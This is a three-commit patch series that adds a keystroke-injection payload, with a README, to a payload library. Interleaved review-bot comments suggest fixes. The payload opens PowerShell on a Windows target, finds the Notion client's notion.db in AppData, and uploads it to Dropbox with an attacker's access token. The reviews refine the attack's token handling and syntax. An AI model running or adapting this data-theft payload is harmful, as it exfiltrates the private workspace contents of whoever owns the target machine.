From 821bb9c0e9259f97be0aa43e5c552a5e6c73828c Mon Sep 17 00:00:00 2001
From: Aleff
Date: Mon, 12 Jun 2023 14:38:58 +0200
Subject: [PATCH 1/3] Exfiltrates the entire database of the Notion client
---
.../payload.txt | 49 +++++++++++++++++++
1 file changed, 49 insertions(+)
create mode 100644 payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt
diff --git a/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt b/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt
new file mode 100644
index 0000000..fd7c904
--- /dev/null
+++ b/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt
@@ -0,0 +1,49 @@
+REM #########################################################################
+REM # |
+REM # Title : Exfiltrates the entire database of the Notion client |
+REM # Author : Aleff |
+REM # Version : 1.0 |
+REM # Category : Exfiltration |
+REM # Target : Windows 10-11 |
+REM # |
+REM #########################################################################
+
+
+REM Requirements:
+REM - Notion must be installed
+REM - Internet Connection
+
+
+REM You must define your Dropbox accessToken or modify the exfiltration modality.
+DEFINE DROPBOX_ACCESS_TOKEN example
+
+GUI r
+DELAY 1000
+STRING PowerShell
+ENTER
+DELAY 2000
+
+REM Setting about exfiltration
+STRING $accessToken = "
+STRING DROPBOX_ACCESS_TOKEN
+STRING "
+ENTER
+
+REM Settings about Notion DB
+STRINGLN
+ $NotionPath = Join-Path -Path $env:APPDATA -ChildPath 'Notion'
+ $NotionDatabasePath = Join-Path -Path $NotionPath -ChildPath "notion.db"
+
+ $authHeader = @{Authorization = "Bearer $accessToken"}
+
+ $uploadUrl = "https://content.dropboxapi.com/2/files/upload"
+
+ $dropboxFilePath = "/notion.db"
+
+ $headers = @{}
+ $headers.Add("Authorization", "Bearer $accessToken")
+ $headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}')
+ $headers.Add("Content-Type", "application/octet-stream")
+
+ Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $NotionDatabasePath; exit;
+END_STRINGLN
From d12271c1c52bc5569e6a1678673a9d5fdc5699ba Mon Sep 17 00:00:00 2001
From: aleff-github
Date: Mon, 12 Jun 2023 14:39:33 +0200
Subject: [PATCH 2/3] Create README.md
---
.../README.md | 22 +++++++++++++++++++
1 file changed, 22 insertions(+)
create mode 100644 payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/README.md
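Review bot: The Dropbox token from `DEFINE DROPBOX_ACCESS_TOKEN` in payload.txt (PATCH 1/3) is typed in clear text into an interactive PowerShell window on the target (`STRING $accessToken = "` … `STRING "`), so it has to be treated as disclosed to that host; depending on configuration it can be recorded in PSReadLine history and in PowerShell script block logging. The header only says to define the token; I would add a comment such as `REM The token is typed on the target and may be logged there: use a token scoped to a single app folder and revoke it after the test.` The same applies to `STRINGLN $accessToken = "#DROPBOX_ACCESS_TOKEN"` in PATCH 3/3. Separately, `$authHeader` is assigned but never read, since `$headers` carries the same Authorization value, so that line can be dropped.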
diff --git a/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/README.md b/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/README.md
new file mode 100644
index 0000000..d295951
--- /dev/null
+++ b/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/README.md
@@ -0,0 +1,22 @@
+# Exfiltrates the entire database of the Notion client
+
+This script can be used to exfiltrate the entire Notion database and thus all client-level content of your Notion account.
+
+**Category**: Exfiltration
+
+## Description
+
+This script can be used to exfiltrate the entire Notion database and thus all client-level content of your Notion account.
+
+Open a PowerShell, the get dinamically the Notion full-path and then add the `notion.db` string. Then create all the needed variables for the exfiltration and then send it trough Dropbox. I used Dropbox but you can use whatever you want.
+
+## Dependencies
+
+* Notion must be installed
+* Internet Connection
+
+## Settings
+
+- You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token.
+
+`DEFINE DROPBOX_ACCESS_TOKEN "example"`
\ No newline at end of file
From 4f7713cda7728cb368f444763d1fca658b5bebbd Mon Sep 17 00:00:00 2001
From: Kalani Helekunihi <324833+kalanihelekunihi@users.noreply.github.com>
Date: Mon, 12 Jun 2023 14:02:49 -0400
Subject: [PATCH 3/3] Update payload.txt
---
.../payload.txt | 9 +++------
1 file changed, 3 insertions(+), 6 deletions(-)
diff --git a/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt b/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt
index fd7c904..896cd5b 100644
--- a/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt
+++ b/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt @@ -15,7 +15,7 @@ REM - Internet Connection REM You must define your Dropbox accessToken or modify the exfiltration modality. -DEFINE DROPBOX_ACCESS_TOKEN example +DEFINE #DROPBOX_ACCESS_TOKEN example GUI r DELAY 1000 @@ -24,13 +24,10 @@ ENTER DELAY 2000 REM Setting about exfiltration -STRING $accessToken = " -STRING DROPBOX_ACCESS_TOKEN -STRING " -ENTER +STRINGLN $accessToken = "#DROPBOX_ACCESS_TOKEN" REM Settings about Notion DB -STRINGLN +STRINGLN_BLOCK $NotionPath = Join-Path -Path $env:APPDATA -ChildPath 'Notion' $NotionDatabasePath = Join-Path -Path $NotionPath -ChildPath "notion.db"
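Review bot: The rename to `#DROPBOX_ACCESS_TOKEN` in the first hunk leaves the README from PATCH 2/3 out of date, since its Settings section still shows `DEFINE DROPBOX_ACCESS_TOKEN "example"`, without the `#` prefix and with quotes that the payload's own `DEFINE` line does not use. The README line should be updated in the same commit to match the payload, `DEFINE #DROPBOX_ACCESS_TOKEN example`. In the second hunk the block opened by `STRINGLN_BLOCK` is closed outside the hunk, so the closing keyword is not visible here.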